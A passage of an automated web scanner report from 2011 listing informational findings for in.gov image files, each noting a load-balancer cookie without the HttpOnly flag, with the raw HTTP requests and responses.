...[SNIP]...

14.334. http://in.gov/core/images/highlights_left.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/highlights_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/highlights_left.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:26 GMT
Server: Apache
Last-Modified: Mon, 19 Apr 2010 15:45:02 GMT
ETag: "11847e-424-48498d8151b80"
Accept-Ranges: bytes
Content-Length: 1060
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:26 GMT; path=/

GIF89a
..........................................................................................cw.au.av.dx.ey.g{.Qh.h{.j}.Of.Md~Kb}t..|..Ri.gz.......o..k....l.`u....p........Ia{...................
...[SNIP]...

14.335. http://in.gov/core/images/highlights_right.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/highlights_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/highlights_right.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:29 GMT
Server: Apache
Last-Modified: Mon, 19 Apr 2010 15:49:10 GMT
ETag: "118480-424-48498e6dd4980"
Accept-Ranges: bytes
Content-Length: 1060
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:29 GMT; path=/

GIF89a
..........................................................................................av.cw.au.dx.ey.g{.Qh.h{.j}.Of.Md~Kb}t..|..............Ia{q..k.............m.....Ja|...p..cw....l.Ri..
...[SNIP]...

14.336. http://in.gov/core/images/icon_email.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_email.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_email.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:21 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:42:58 GMT
ETag: "ec2bb7-f60-486f7aa3cd480"
Accept-Ranges: bytes
Content-Length: 3936
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:21 GMT; path=/

GIF89ad.........^..Sj.Vl.Xn.[q.\q.[p.fz.l..s..w..Xn.`u.]r.dy.cx.j~.r..Wn.bw.s..u..}.._u...1Zq.\s.ax.f|.cz.p..e{.l..e|.j.._w.w..f}.z..h..&/bz.h..j..k..j..t..{..c}.h..k..l..d~..,-d}~l..m..n..n..m..g.~o
...[SNIP]...

14.337. http://in.gov/core/images/icon_findperson.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_findperson.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_findperson.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:23 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:44:24 GMT
ETag: "ec2bb3-1208-486f7af5d1600"
Accept-Ranges: bytes
Content-Length: 4616
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:23 GMT; path=/

GIF89ad...............Sj.Vl.Xn.Yo.\q.[p.`u.`t._s.i}.s..u..w..}..........1Xn.]r.ez.ex.m..r..u..........av.\p.bw.au.dw.cw._r.n..j|.t..}..fy.i{.cv.fy.j|.p..w.....ew|..fxl~.s..v..p.p...(+o.j{}u..s..x
...[SNIP]...

14.338. http://in.gov/core/images/icon_help.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_help.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_help.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:25 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 20:32:39 GMT
ETag: "ec2bbc-f27-486f85beb47c0"
Accept-Ranges: bytes
Content-Length: 3879
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:25 GMT; path=/

GIF89ad..........Kc..............#..).....3..6.#;.$<.%=.&>.'?.*B..F.1I.3K.4L.5M.3K.6N.7O.8P.9Q.7O.:R.;S.<T.>V.=U.?W.@X.BZ.=U.E].D\.D[.F^.C[.G_.F].E].H`.Jb.Ia.H`.G_.G_.F].Ld.Kc.D[.Jb.H`.Nf.Me.Ph.Rj.Qi.
...[SNIP]...

14.339. http://in.gov/core/images/icon_link.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_link.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_link.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:22 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:46:03 GMT
ETag: "ec2bb4-1006-486f7b543b4c0"
Accept-Ranges: bytes
Content-Length: 4102
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:22 GMT; path=/

GIF89ad.........'..Sj.Wn.Vl.Xn.Yo.Zp.\r.\q.`u.ey.i}.~..[r.[r.]t.l..u..r..x....9Ys.Xp.Yq.^v.f}.Yt.Yr._x._x.n..^z.`{.b}.p...'?[x.[w.\x.d..\{.c..v..\}.]~.\{.e..l...2Gf.._..h..h..g..k..o..`..f..l..j..i..j
...[SNIP]...

14.340. http://in.gov/core/images/icon_mobile.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_mobile.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_mobile.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:28 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:46:54 GMT
ETag: "ec2bbb-10a6-486f7b84de780"
Accept-Ranges: bytes
Content-Length: 4262
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:28 GMT; path=/

GIF89ad..........^.E.cF.dH.fL.jO.mQ.oS.qV tY#w[%y^(|`*~d..f0.h2.k5.p:.|F.I..M..R..W..Z..].._..b..e..f..j..s..t..x..|..{..~..............................................m9.r?.wB.xD..Q..P..U..Y..X..\..
...[SNIP]...

14.341. http://in.gov/core/images/icon_ratepage.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_ratepage.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_ratepage.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:23 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 14:33:34 GMT
ETag: "ec2bb6-f3f-4870775940b80"
Accept-Ranges: bytes
Content-Length: 3903
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:23 GMT; path=/

GIF89ad..........K.....E.j.gf.cd.am.jf.cq.ni
gw.t|.y..~o.l...r.o....$..%..&.v.t.'..*../..0..3..4..5..6..7..8..6..;..=..?..@..B..D..E..F..H..G..F..I..H..L..O..P..R..O..T..U..T..W..V..Z..Y..\..]..b..d..
...[SNIP]...

14.342. http://in.gov/core/images/icon_rss.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_rss.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_rss.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:23 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:48:03 GMT
ETag: "ec2bb8-100f-486f7bc6ac2c0"
Accept-Ranges: bytes
Content-Length: 4111
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:23 GMT; path=/

GIF89ad..........T..~.......y|.......{.}.....v{...5%+.y......}....w~*"-.|.....~.{w~~|.}{.zx.uu.{|.z{.st~...os.ty.os~..1z..jr.lt.nw.px.v~.dp.kv....ao.x..^n._n.gu.p~.iv.Zn.Zm._q._p.ct.k{.r..y..~..S
...[SNIP]...

14.343. http://in.gov/core/images/icon_subscribe.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_subscribe.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_subscribe.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:22 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:48:51 GMT
ETag: "ec2bb5-116d-486f7bf472ec0"
Accept-Ranges: bytes
Content-Length: 4461
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:22 GMT; path=/

GIF89ad..........Kc..............#..(..+..-../..3..6.":.$<.&>.,D.2I.3K.4L.6N.2I.5L.:R.;S.<T.:Q.=U.@X.:Q.C[.D\.BZ.BZ.AX.F^.F].H`.F^.E].Ia.G_.E].Ld.H`.Nf.Ph.Lc.Kb.Rj.Nf.Vn.Um.Wo.Um.Tl.Ri.Vn.Zr.Yq.\t.^v.
...[SNIP]...

14.344. http://in.gov/core/images/icon_twitter.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_twitter.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_twitter.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:23 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:49:36 GMT
ETag: "ec2bb9-efc-486f7c1f5d400"
Accept-Ranges: bytes
Content-Length: 3836
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:23 GMT; path=/

GIF89ad............Vn.Sj.Xo.Vl.Xn.[r.\s.Zp.]r.`u.i}.w....>Xq.Xp.e{.dy.m..r..Xu.Xt.Xr.^x.]v.h..o...'HYx.a._}.^{.g..u..W{.X{.`.._..c..j...0SX..X..W.W~.`..`.._..`.._..^..`..f..k...9]Y..V..X..X..^..W..`
...[SNIP]...

14.345. http://in.gov/core/images/icon_youtube.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/icon_youtube.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/icon_youtube.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:24 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:50:28 GMT
ETag: "ec2bba-117f-486f7c50f4900"
Accept-Ranges: bytes
Content-Length: 4479
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:24 GMT; path=/

GIF89ad..........>>.................... ..!.().*+.().%'.01.$&.;<.:=.24.FG.?A.LM.HJ.NP.EG.]^.Z[.UW.fg.ac.TU.[].fh.`b.op.tu.uw.~.tv....................................#&. #.59.49.=A.CG.IL.OR.fi.eh.nq.
...[SNIP]...

14.346. http://in.gov/core/images/indiana_map.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/indiana_map.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/indiana_map.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:31 GMT
Server: Apache
Last-Modified: Mon, 24 May 2010 16:35:53 GMT
ETag: "4de525-16eb-48759a261cc40"
Accept-Ranges: bytes
Content-Length: 5867
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:31 GMT; path=/

GIF89ad...........mps......~....................qtthkn...filvy|............`cf.........{~.jmp...]`c...............ruyWZ\......cehx{~........................[^a.........DGK...............lor...ORU....
...[SNIP]...

14.347. http://in.gov/core/images/ingov_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/ingov_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/ingov_logo.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:09 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 13:20:52 GMT
ETag: "4de528-478-483915090b500"
Accept-Ranges: bytes
Content-Length: 1144
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:09 GMT; path=/

GIF89a}.(.......j}....-QPf.(Dd....8Z......]r....w..C[w5Om.!G................................................!.......,....}.(.... $.di.h..l..p,.tM.N..AO........@.Q.`%....(.............(.....q>O].B..L
...[SNIP]...

14.348. http://in.gov/core/images/lgov.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/lgov.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/lgov.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:18 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2010 16:16:31 GMT
ETag: "11848e-1959-48448d14f75c0"
Accept-Ranges: bytes
Content-Length: 6489
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:18 GMT; path=/

GIF89aZ._.....XL........k....{d.XG....{h.wd....v]....WC..j.tZ.iU.tY..y....cH...........q..k.jV.{b.u[..s...yF8......'...."..{....V9....gU.fH..l..w.....s..r.T<...l...zh.......$-.......{.T;.I6.....s..}.
...[SNIP]...

14.349. http://in.gov/core/images/link_divider.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/link_divider.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/link_divider.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:21 GMT
Server: Apache
Last-Modified: Mon, 12 Apr 2010 19:53:05 GMT
ETag: "ec2bb2-367-4840f7e4a0a40"
Accept-Ranges: bytes
Content-Length: 871
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:21 GMT; path=/

GIF89a..#...............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...

14.350. http://in.gov/core/images/main_bg-wide.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/main_bg-wide.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/main_bg-wide.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Mon, 10 May 2010 19:55:26 GMT
ETag: "ec2bad-46-48642ca400780"
Accept-Ranges: bytes
Content-Length: 70
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

GIF89a...................,.............................H.........w@..;

14.351. http://in.gov/core/images/main_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/main_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/main_bg.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:30 GMT
Server: Apache
Last-Modified: Fri, 07 May 2010 20:51:04 GMT
ETag: "118484-5c-4860737afbe00"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:30 GMT; path=/

GIF89a...................!.......,..........-..................H...Z@......L..........
....;

14.352. http://in.gov/core/images/next.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/next.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/next.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:15 GMT
Server: Apache
Last-Modified: Mon, 12 Apr 2010 19:29:42 GMT
ETag: "4de532-2f0-4840f2aa9f580"
Accept-Ranges: bytes
Content-Length: 752
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:15 GMT; path=/

GIF89a.....{....p..............q.............................m}....|..............ar.~..{..|....................v..............bs.cu.......r.............................gx..........hx................d
...[SNIP]...

14.353. http://in.gov/core/images/next.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/next.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/next.png HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

